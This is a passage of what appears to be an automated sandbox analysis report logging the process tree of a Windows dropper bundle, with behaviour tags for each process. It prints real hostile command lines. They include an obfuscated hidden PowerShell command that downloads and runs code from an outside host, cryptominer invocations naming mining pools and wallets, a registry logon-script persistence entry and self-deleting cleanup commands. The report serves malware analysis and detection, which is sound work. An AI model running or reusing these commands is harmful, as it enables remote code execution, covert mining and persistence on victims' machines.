                                                                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
                                                                                    13⤵
                                                                                    • Loads dropped DLL
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    PID:192
                                                                              • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe
                                                                                "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"
                                                                                11⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:5824
                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                  12⤵
                                                                                    PID:5232
                                                                                • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
                                                                                  "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
                                                                                  11⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4452
                                                                                  • C:\Users\Admin\AppData\Local\Temp\EOOU1XFO07\multitimer.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\EOOU1XFO07\multitimer.exe" 0 306065bb10421b26.04333812 0 103
                                                                                    12⤵
                                                                                      PID:2856
                                                                                      • C:\Users\Admin\AppData\Local\Temp\EOOU1XFO07\multitimer.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\EOOU1XFO07\multitimer.exe" 1 3.1617560744.606a04a8665d3 103
                                                                                        13⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:5172
                                                                                        • C:\Users\Admin\AppData\Local\Temp\EOOU1XFO07\multitimer.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\EOOU1XFO07\multitimer.exe" 2 3.1617560744.606a04a8665d3
                                                                                          14⤵
                                                                                          • Checks for any installed AV software in registry
                                                                                          PID:5048
                                                                                          • C:\Users\Admin\AppData\Local\Temp\u1pyebuag0v\a1hfym00uwy.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\u1pyebuag0v\a1hfym00uwy.exe" /ustwo INSTALL
                                                                                            15⤵
                                                                                              PID:12172
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "a1hfym00uwy.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\u1pyebuag0v\a1hfym00uwy.exe" & exit
                                                                                                16⤵
                                                                                                  PID:9584
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /im "a1hfym00uwy.exe" /f
                                                                                                    17⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:10124
                                                                                              • C:\Users\Admin\AppData\Local\Temp\ysu1qhphsfc\Setup3310.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\ysu1qhphsfc\Setup3310.exe" /Verysilent /subid=577
                                                                                                15⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:12216
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-9JDRO.tmp\Setup3310.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-9JDRO.tmp\Setup3310.tmp" /SL5="$4027A,138429,56832,C:\Users\Admin\AppData\Local\Temp\ysu1qhphsfc\Setup3310.exe" /Verysilent /subid=577
                                                                                                  16⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:11872
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LSB73.tmp\Setup.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LSB73.tmp\Setup.exe" /Verysilent
                                                                                                    17⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:8448
                                                                                              • C:\Users\Admin\AppData\Local\Temp\qjcq3su5k0p\cpyrix.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\qjcq3su5k0p\cpyrix.exe" /VERYSILENT
                                                                                                15⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:12248
                                                                                                • C:\Users\Admin\AppData\Roaming\1.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\1.exe
                                                                                                  16⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:7400
                                                                                                  • C:\Users\Admin\AppData\Roaming\1.exe
                                                                                                    "{path}"
                                                                                                    17⤵
                                                                                                      PID:5032
                                                                                                  • C:\Users\Admin\AppData\Roaming\2.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\2.exe
                                                                                                    16⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:7612
                                                                                                    • C:\Users\Admin\AppData\Roaming\2.exe
                                                                                                      "{path}"
                                                                                                      17⤵
                                                                                                        PID:7544
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\utbgze1deu0\vpn.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\utbgze1deu0\vpn.exe" /silent /subid=482
                                                                                                    15⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:12268
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-EBTGS.tmp\vpn.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-EBTGS.tmp\vpn.tmp" /SL5="$30264,15170975,270336,C:\Users\Admin\AppData\Local\Temp\utbgze1deu0\vpn.exe" /silent /subid=482
                                                                                                      16⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:12424
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\5oki5fz4mui\vict.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\5oki5fz4mui\vict.exe" /VERYSILENT /id=535
                                                                                                    15⤵
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:6480
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-H5TU9.tmp\vict.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-H5TU9.tmp\vict.tmp" /SL5="$403D2,870426,780800,C:\Users\Admin\AppData\Local\Temp\5oki5fz4mui\vict.exe" /VERYSILENT /id=535
                                                                                                      16⤵
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:6708
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-BP6T1.tmp\win1host.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-BP6T1.tmp\win1host.exe" 535
                                                                                                        17⤵
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:8280
                                                                                            • C:\Users\Admin\AppData\Local\Temp\66GPQKHYVS\setups.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\66GPQKHYVS\setups.exe" ll
                                                                                              12⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:2588
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-A1CAP.tmp\setups.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-A1CAP.tmp\setups.tmp" /SL5="$40308,454998,229376,C:\Users\Admin\AppData\Local\Temp\66GPQKHYVS\setups.exe" ll
                                                                                                13⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4448
                                                                                          • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
                                                                                            "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
                                                                                            11⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4960
                                                                                          • C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
                                                                                            "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
                                                                                            11⤵
                                                                                            • Executes dropped EXE
                                                                                            • Drops file in Program Files directory
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:5800
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                              12⤵
                                                                                                PID:2620
                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                  13⤵
                                                                                                  • Loads dropped DLL
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:5468
                                                                                      • C:\Users\Admin\AppData\Local\Temp\3a4earbvy1a\tjreorukms2.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\3a4earbvy1a\tjreorukms2.exe" /VERYSILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Maps connected drives based on registry
                                                                                        • Drops file in Windows directory
                                                                                        • Enumerates system info in registry
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2188
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-13RO8.tmp\tjreorukms2.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-13RO8.tmp\tjreorukms2.tmp" /SL5="$20306,2592217,780800,C:\Users\Admin\AppData\Local\Temp\3a4earbvy1a\tjreorukms2.exe" /VERYSILENT
                                                                                          9⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Drops file in Program Files directory
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:5168
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-EDOBE.tmp\winlthsth.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-EDOBE.tmp\winlthsth.exe"
                                                                                            10⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            PID:6124
                                                                                            • C:\Users\Admin\AppData\Local\Temp\VDixaT7Dq.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\VDixaT7Dq.exe"
                                                                                              11⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:6288
                                                                                              • C:\Windows\SysWOW64\at.exe
                                                                                                "C:\Windows\System32\at.exe"
                                                                                                12⤵
                                                                                                  PID:10520
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif
                                                                                                  12⤵
                                                                                                    PID:11068
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\System32\cmd.exe
                                                                                                      13⤵
                                                                                                        PID:11004
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                    11⤵
                                                                                                      PID:4184
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                                        12⤵
                                                                                                        • Blocklisted process makes network request
                                                                                                        PID:5276
                                                                                              • C:\Users\Admin\AppData\Local\Temp\2mnlevhncpl\vpn.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\2mnlevhncpl\vpn.exe" /silent /subid=482
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:4920
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-S8C2V.tmp\vpn.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-S8C2V.tmp\vpn.tmp" /SL5="$20324,15170975,270336,C:\Users\Admin\AppData\Local\Temp\2mnlevhncpl\vpn.exe" /silent /subid=482
                                                                                                  9⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in Program Files directory
                                                                                                  • Modifies system certificate store
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:5160
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                    10⤵
                                                                                                      PID:5884
                                                                                                      • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                        tapinstall.exe remove tap0901
                                                                                                        11⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:2564
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                      10⤵
                                                                                                        PID:4352
                                                                                                        • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                          tapinstall.exe install OemVista.inf tap0901
                                                                                                          11⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Drops file in System32 directory
                                                                                                          • Drops file in Windows directory
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Modifies system certificate store
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          PID:5856
                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                        10⤵
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:9780
                                                                                                      • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                        "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                        10⤵
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6408
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\celejhdmpbw\vict.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\celejhdmpbw\vict.exe" /VERYSILENT /id=535
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                    PID:4972
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-D5TRH.tmp\vict.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-D5TRH.tmp\vict.tmp" /SL5="$20346,870426,780800,C:\Users\Admin\AppData\Local\Temp\celejhdmpbw\vict.exe" /VERYSILENT /id=535
                                                                                                      9⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in Program Files directory
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:5236
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-EO01G.tmp\win1host.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-EO01G.tmp\win1host.exe" 535
                                                                                                        10⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:6044
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\iv4wvq3t0r3\app.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\iv4wvq3t0r3\app.exe" /8-23
                                                                                                    8⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4856
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\iv4wvq3t0r3\app.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\iv4wvq3t0r3\app.exe" /8-23
                                                                                                      9⤵
                                                                                                        PID:12780
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kkhctuwxqkt\IBInstaller_97039.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\kkhctuwxqkt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                      PID:4460
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-5MA4A.tmp\IBInstaller_97039.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-5MA4A.tmp\IBInstaller_97039.tmp" /SL5="$30326,14575146,721408,C:\Users\Admin\AppData\Local\Temp\kkhctuwxqkt\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Drops file in Program Files directory
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:5188
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          "cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-B1PK1.tmp\{app}\microsoft.cab -F:* %ProgramData%
                                                                                                          10⤵
                                                                                                            PID:5472
                                                                                                            • C:\Windows\SysWOW64\expand.exe
                                                                                                              expand C:\Users\Admin\AppData\Local\Temp\is-B1PK1.tmp\{app}\microsoft.cab -F:* C:\ProgramData
                                                                                                              11⤵
                                                                                                              • Drops file in Windows directory
                                                                                                              PID:5608
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^&param=
                                                                                                            10⤵
                                                                                                            • Checks computer location settings
                                                                                                            PID:10872
                                                                                                          • C:\ProgramData\regid.1993-06.com.microsoft\client32.exe
                                                                                                            "C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"
                                                                                                            10⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:10852
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f
                                                                                                            10⤵
                                                                                                              PID:10828
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-B1PK1.tmp\{app}\chrome_proxy.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-B1PK1.tmp\{app}\chrome_proxy.exe"
                                                                                                              10⤵
                                                                                                                PID:7332
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-B1PK1.tmp\{app}\chrome_proxy.exe"
                                                                                                                  11⤵
                                                                                                                    PID:4752
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping localhost -n 4
                                                                                                                      12⤵
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:12124
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\h4srb2jjdls\fzmpygpyood.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\h4srb2jjdls\fzmpygpyood.exe" /quiet SILENT=1 AF=756
                                                                                                              8⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates connected drives
                                                                                                              • Modifies system certificate store
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:4604
                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\h4srb2jjdls\fzmpygpyood.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\h4srb2jjdls\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617308717 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"
                                                                                                                9⤵
                                                                                                                  PID:5412
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\SNHOC9Q3EQ\setups.exe
                                                                                                          "C:\Users\Admin\AppData\Local\Temp\SNHOC9Q3EQ\setups.exe" ll
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3880
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-QI6O2.tmp\setups.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-QI6O2.tmp\setups.tmp" /SL5="$80060,454998,229376,C:\Users\Admin\AppData\Local\Temp\SNHOC9Q3EQ\setups.exe" ll
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks computer location settings
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:1080
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Modifies system certificate store
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:1344
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                                          5⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3064
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im chrome.exe
                                                                                                            6⤵
                                                                                                            • Kills process with taskkill
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:736
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Program Files directory
                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                        PID:4560
                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
                                                                                                          5⤵
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4628
                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                            "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
                                                                                                            6⤵
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:4772
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                        4⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:4692
                                                                                                        • C:\Users\Admin\AppData\Roaming\4DA4.tmp.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\4DA4.tmp.exe"
                                                                                                          5⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Adds Run key to start application
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:3768
                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w29561 --cpu-max-threads-hint 50 -r 9999
                                                                                                            6⤵
                                                                                                            • Blocklisted process makes network request
                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                            PID:5848
                                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                                            -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w28776@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                            6⤵
                                                                                                              PID:6036
                                                                                                          • C:\Users\Admin\AppData\Roaming\4F79.tmp.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\4F79.tmp.exe"
                                                                                                            5⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4636
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              /c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\4F79.tmp.exe
                                                                                                              6⤵
                                                                                                                PID:4928
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 3
                                                                                                                  7⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:3176
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                              5⤵
                                                                                                                PID:5688
                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                  ping 127.0.0.1
                                                                                                                  6⤵
                                                                                                                  • Runs ping.exe
                                                                                                                  PID:5944
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks whether UAC is enabled
                                                                                                              PID:5832
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                              4⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5960
                                                                                                              • C:\ProgramData\5800494.exe
                                                                                                                "C:\ProgramData\5800494.exe"
                                                                                                                5⤵
                                                                                                                • Adds Run key to start application
                                                                                                                PID:5640
                                                                                                                • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                  "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                  6⤵
                                                                                                                    PID:12492
                                                                                                                • C:\ProgramData\1445308.exe
                                                                                                                  "C:\ProgramData\1445308.exe"
                                                                                                                  5⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:5996
                                                                                                                  • C:\ProgramData\1445308.exe
                                                                                                                    "{path}"
                                                                                                                    6⤵
                                                                                                                      PID:9364
                                                                                                                    • C:\ProgramData\1445308.exe
                                                                                                                      "{path}"
                                                                                                                      6⤵
                                                                                                                        PID:9392
                                                                                                                    • C:\ProgramData\7811106.exe
                                                                                                                      "C:\ProgramData\7811106.exe"
                                                                                                                      5⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:6256
                                                                                                                      • C:\ProgramData\7811106.exe
                                                                                                                        "{path}"
                                                                                                                        6⤵
                                                                                                                          PID:9832
                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                1⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:576
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                  2⤵
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  PID:4892
                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                1⤵
                                                                                                                • Drops file in Windows directory
                                                                                                                • Modifies Internet Explorer settings
                                                                                                                • Modifies registry class
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:1264
                                                                                                              • C:\Windows\system32\browser_broker.exe
